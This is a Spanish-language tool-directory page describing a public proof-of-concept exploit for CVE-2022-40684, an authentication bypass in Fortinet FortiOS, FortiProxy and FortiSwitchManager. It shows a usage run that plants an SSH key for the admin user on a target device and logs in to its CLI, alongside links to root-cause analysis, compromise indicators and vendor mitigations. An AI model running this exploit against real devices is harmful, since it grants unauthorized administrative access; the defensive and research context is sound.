Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-40684 | Kitploit
Herramientas/GitHubGitHub/puckiestyle/cve-2022-40684
Análisis de VulnerabilidadesExplotaciónSeguridad WebSeguridad de RedesPruebas de PenetraciónAutenticación
GitHubpuckiestyle/cve-2022-40684

CVE-2022-40684

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-40684

POC para CVE-2022-40684 que afecta a los dispositivos Fortinet FortiOS, FortiProxy y FortiSwitchManager.

Análisis técnico

En nuestro blog puedes encontrar un análisis técnico de causa raíz de la vulnerabilidad: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

Indicadores de compromiso

Para analizar los registros de Fortinet en busca de indicadores de compromiso y saber cómo habilitar registros más detallados, consulta nuestro blog de IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

Resumen

Este POC aprovecha la vulnerabilidad de omisión de autenticación para establecer una clave SSH para el usuario especificado.

Uso

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

Mitigaciones

Actualiza a la última versión o mitiga siguiendo las instrucciones del PSIRT de Fortinet

  • https://www.fortiguard.com/psirt/FG-IR-22-377

Sigue al equipo de ataque Horizon3.ai en Twitter para conocer las últimas investigaciones de seguridad:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Descargo de responsabilidad

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas eficaces, y no está pensado para usarse contra sistemas salvo que se cuente con autorización explícita. Los mantenedores del proyecto no se hacen responsables del mal uso del software. Úsalo de forma responsable.

Descargar herramienta